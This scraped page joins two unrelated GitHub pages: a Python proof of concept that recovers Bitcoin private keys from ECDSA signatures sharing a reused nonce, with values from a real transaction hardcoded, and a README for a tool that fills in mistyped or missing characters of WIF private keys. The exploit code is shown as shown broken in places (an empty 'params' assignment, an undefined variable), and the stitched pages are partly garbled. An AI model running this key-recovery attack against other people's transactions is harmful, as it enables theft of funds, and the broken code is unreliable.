Bitcoin private key recover
1 contributor
Users who have contributed to this file
| #!/usr/bin/env python |
| # |
| # Proof of concept of bitcoin private key recovery using weak ECDSA signatures |
| # |
| # Based on http://www.nilsschneider.net/2013/01/28/recovering-bitcoin-private-keys.html |
| # Regarding Bitcoin Tx: |
| # https://blockchain.info/tx/9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1. |
| # As it’s said in the previous article you need to poke around into the OP_CHECKSIG |
| # function in order to get z1 and z2, |
| # In other hand for every other parameters you should be able to get them from |
| # the Tx itself. |
| # |
| # Author Dario Clavijo , Jan 2013 |
| # Donations: 1LgWNdNTnzeNgNMzWHtPtXPjxcutJKu74r |
| # |
| # This code is licensed under the terms of the GPLv3 license http://gplv3.fsf.org/ |
| # |
| # Disclaimer: Do not steal other peoples money, that’s bad. |
| # The math |
| # Q=dP compute public key Q where d is a secret scalar and G the base point |
| # (x1,y1)=kP where k is random choosen an secret |
| # r= x1 mod n |
| # compute k**-1 or inv(k) |
| # compute z=hash(m) |
| # s= inv(k)(z + d) mod n |
| # sig=k(r,s) or (r,-s mod n) |
| # Key recovery |
| # d = (sk-z)/r where r is the same |
| import hashlib |
| b58_digits = «123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz» |
| tx = «9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1» |
| p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 |
| # r = 0xd47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1 |
| # s1 = 0x44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e |
| # s2 = 0x9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab |
| z1 = 0xC0E2D0A89A348DE88FDA08211C70D1D7E52CCEF2EB9459911BF977D587784C6E |
| z2 = 0x17B0F41C8C337AC1E18C98759E83A8CCCBC368DD9D89E5F03CB633C265FD0DDC |
| # r1 and s1 are contained in this ECDSA signature encoded in DER (openssl default). |
| der_sig1 = «3044» |
| der_sig1 += «0220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1» |
| der_sig1 += «022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e» |
| der_sig1 += «01» |
| # the same thing with the above line. |
| der_sig2 = «3044» |
| der_sig2 += «0220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1» |
| der_sig2 += «02209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab» |
| der_sig2 += «01» |
| params = |
| def hexify ( s , flip = False ): |
| if flip : |
| return s [:: — 1 ]. encode ( «hex» ) |
| else : |
| return s . encode ( «hex» ) |
| def unhexify ( s , flip = False ): |
| if flip : |
| return s . decode ( «hex» )[:: — 1 ] |
| else : |
| return s . decode ( «hex» ) |
| def dhash ( s ): |
| return hashlib . sha256 ( hashlib . sha256 ( s ). digest ()). digest () |
| def rhash ( s ): |
| h1 = hashlib . new ( «ripemd160» ) |
| h1 . update ( hashlib . sha256 ( s ). digest ()) |
| return h1 . digest () |
| def base58_encode ( n ): |
| tmp = [] |
| while n > 0 : |
| n , r = divmod ( n , 58 ) |
| tmp . insert ( 0 , ( b58_digits [ r ])) |
| return «» . join ( tmp ) |
| def base58_encode_padded ( s ): |
| res = base58_encode ( int ( «0x» + s . encode ( «hex» ), 16 )) |
| pad = 0 |
| for c in s : |
| if c == chr ( 0 ): |
| pad += 1 |
| else : |
| break |
| return b58_digits [ 0 ] * pad + res |
| def base58_check_encode ( s , version = 0 ): |
| vs = chr ( version ) + s |
| check = dhash ( vs )[: 4 ] |
| return base58_encode_padded ( vs + check ) |
| def get_der_field ( i , binary ): |
| if ord ( binary [ i ]) == 2 : |
| length = binary [ i + 1 ] |
| end = i + ord ( length ) + 2 |
| string = binary [ i + 2 : end ] |
| return string |
| else : |
| return None |
| # Here we decode a DER encoded string separating r and s |
| def der_decode ( hexstring ): |
| binary = unhexify ( hexstring ) |
| full_length = ord ( binary [ 1 ]) |
| if ( full_length + 3 ) == len ( binary ): |
| r = get_der_field ( 2 , binary ) |
| s = get_der_field ( len ( r ) + 4 , binary ) |
| return r , s |
| else : |
| return None |
| def show_results ( privkeys ): |
| print ( «Posible Candidates. » ) |
| for privkey in privkeys : |
| print ( «intPrivkey = %d» % privkey ) |
| print ( «hexPrivkey = %064x» % privkey ) |
| wif = base58_check_encode ( hexprivkey . decode ( «hex» ), version = 128 ) |
| print ( «bitcoin Privkey (WIF) = %s» % wif ) |
| wif = base58_check_encode (( hexprivkey + «01» ). decode ( «hex» ), version = 128 ) |
| print ( «bitcoin Privkey (WIF compressed) = %s» % wif ) |
| def show_params ( params ): |
| for param in params : |
| try : |
| print ( «%s: %064x» % ( param , params [ param ])) |
| except TypeError : |
| print ( «%s: %s» % ( param , params [ param ])) |
| def inverse_mult ( a , b , p ): |
| «»»By the Fermat’s little theorem we can say that: |
| a * pow(b,p-2,p) % p is the same as (a/b mod p) |
| This is needed to avoid floating numbers since we are dealing with prime numbers |
| and beacuse this the python built in division isn’t suitable for our needs, |
| it returns floating point numbers rounded and we don’t want them.»»» |
| y = ( |
| a * pow ( b , p — 2 , p ) |
| ) % p # (pow(a, b) modulo p) where p should be a prime number |
| return y |
| # Here is the wrock! |
| def derivate_privkey ( p , r , s1 , s2 , z1 , z2 ): |
| privkey = [] |
| s1ms2 = s1 — s2 |
| s1ps2 = s1 + s2 |
| ms1ms2 = — s1 — s2 |
| ms1ps2 = — s1 + s2 |
| z1ms2 = z1 * s2 |
| z2ms1 = z2 * s1 |
| z1s2mz2s1 = z1ms2 — z2ms1 |
| z1s2pz2s1 = z1ms2 + z2ms1 |
| rs1ms2 = r * s1ms2 |
| rs1ps2 = r * s1ps2 |
| rms1ms2 = r * ms1ms2 |
| rms1ps2 = r * ms1ps2 |
| privkey . append ( inverse_mult ( z1s2mz2s1 , rs1ms2 , p )) |
| privkey . append ( inverse_mult ( z1s2mz2s1 , rs1ps2 , p )) |
| privkey . append ( inverse_mult ( z1s2mz2s1 , rms1ms2 , p )) |
| privkey . append ( inverse_mult ( z1s2mz2s1 , rms1ps2 , p )) |
| privkey . append ( inverse_mult ( z1s2pz2s1 , rs1ms2 , p )) |
| privkey . append ( inverse_mult ( z1s2pz2s1 , rs1ps2 , p )) |
| privkey . append ( inverse_mult ( z1s2pz2s1 , rms1ms2 , p )) |
| privkey . append ( inverse_mult ( z1s2pz2s1 , rms1ps2 , p )) |
| return privkey |
| def process_signatures ( params ): |
| p = params [ «p» ] |
| sig1 = params [ «sig1» ] |
| sig2 = params [ «sig2» ] |
| z1 = params [ «z1» ] |
| z2 = params [ «z2» ] |
| tmp_r1 , tmp_s1 = der_decode ( sig1 ) # Here we extract r and s from the DER signature. |
| tmp_r2 , tmp_s2 = der_decode ( sig2 ) # Idem. |
| # the key of ECDSA are the integer numbers thats why we convert hexa from to them. |
| r1 = int ( tmp_r1 . encode ( «hex» ), 16 ) |
| r2 = int ( tmp_r2 . encode ( «hex» ), 16 ) |
| s1 = int ( tmp_s1 . encode ( «hex» ), 16 ) |
| s2 = int ( tmp_s2 . encode ( «hex» ), 16 ) |
| # If r1 and r2 are equal the two signatures are weak |
| # and we can recover the private key. |
| if r1 == r2 : |
| if s1 != s2 : # This:(s1-s2)>0 should be complied in order be able to compute. |
| privkey = derivate_privkey ( p , r1 , s1 , s2 , z1 , z2 ) |
| return privkey |
| else : |
| raise Exception ( «Privkey not computable: s1 and s2 are equal.» ) |
| else : |
| raise Exception ( «Privkey not computable: r1 and r2 are not equal.» ) |
| def main (): |
| show_params ( params ) |
| privkey = process_signatures ( params ) |
| if len ( privkey ) > 0 : |
| show_results ( privkey ) |
| if __name__ == «__main__» : |
| main () |
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Источник
Bitcoin private key recover
Bitcoin Private Key Fixer
This tool can find and fix a random typo. If the private key has 1 symbol that is not correct, the tool will find it and change it to its real value and will restore the original private key .
It can find up to 4-5 missing symbols from the private key assuming we know the positions of those missing symbols. It will also work with more missing symbols but with each symbol we add we will slow the script
60 times so it practically becomes useless after the
5th missing character (depending on your computer).
It can also find up to 8-9 missing symbols if they are at the end of the private key .
This is all said below but since people are very cautions and suspicious (as they SHOULD be with such tools) I want to emphasize on it. The only safe way to use the tool is to follow these exact steps:
Download the code -> turn off your internet -> run the code and find the key -> sweep the private key with a mobile wallet to transfer the funds -> remove the tool (instructions below) -> restart computer -> turn on internet.
Even if you haven’t found the key for some reason, you still have to remove the tool and restart the computer before going back online.
The script will only work if
- The private key is in a WIF compressed or uncompressed format. This is a Wallet Import Format that is 51 or 52 characters long (assuming no missing symbols) and should start with 5 for the 51 chars version and with K or L for the 52 chars version.
- The public address that is associated with the private key in question is known.
The basic functionality in the popular https://www.bitaddress.org website for generating a single wallet generates the public address and the private key in those exact formats and they are widely used.
They look like these:
Public address: 1CjV8fZz6R8LTwFaAsRUwWFEJbtEXQp7iu
Private key: L3mopevKjjjcy2mqVbcHs2zWwoujMRpzRyN6mpidwdqmMPmqc6t2
If you don’t have Node.js you have to download it and install it first.
Then run the following commands into the Terminal (for MacOS) or the Command Prompt (for Windows) to download the tool and start playing with it.
At this point it would be best to turn off your internet connection and continue offline because your computer might be infected with viruses or malware. It is also recommended to have a mobile Bitcoin wallet nearby so if the private key is indeed recovered, the funds can be immediately transfered to it because the key would no longer be considered safe (some malicious program might intercept it and steal it).
Restore by fixing a single typo
To fix a typo in the private key, replace the
Restore up to 4-5 missing simbols
To restore missing characters from the WIF private key, replace the
For example (3 missing, replaced with _ )
Recovering 3 missing symbols is almost instant and recovering 4 should take
Restore up to 8-9 missing simbols at the end
To restore missing characters from the end at the WIF private key, replace the
For example (7 missing)
Recovering 7 missing symbols is almost instant and recovering 8 should take
Going back online
If a private key was successfully recovered and the BTC funds were transfered out, it would be best to first delete the tool by running the following comamnd into the Terminal cd ../ && rm -Rf bitcoin-private-key-fixer then restart your computer and only then it would be relatively safe to connect back to the internet.
If a private key is successfully restored any donation would be highly appreciated.
About
This tool fixes a mistyped character in a Bitcoin Private Key, restores up to 5 missing character or up to 9 at the end.
Источник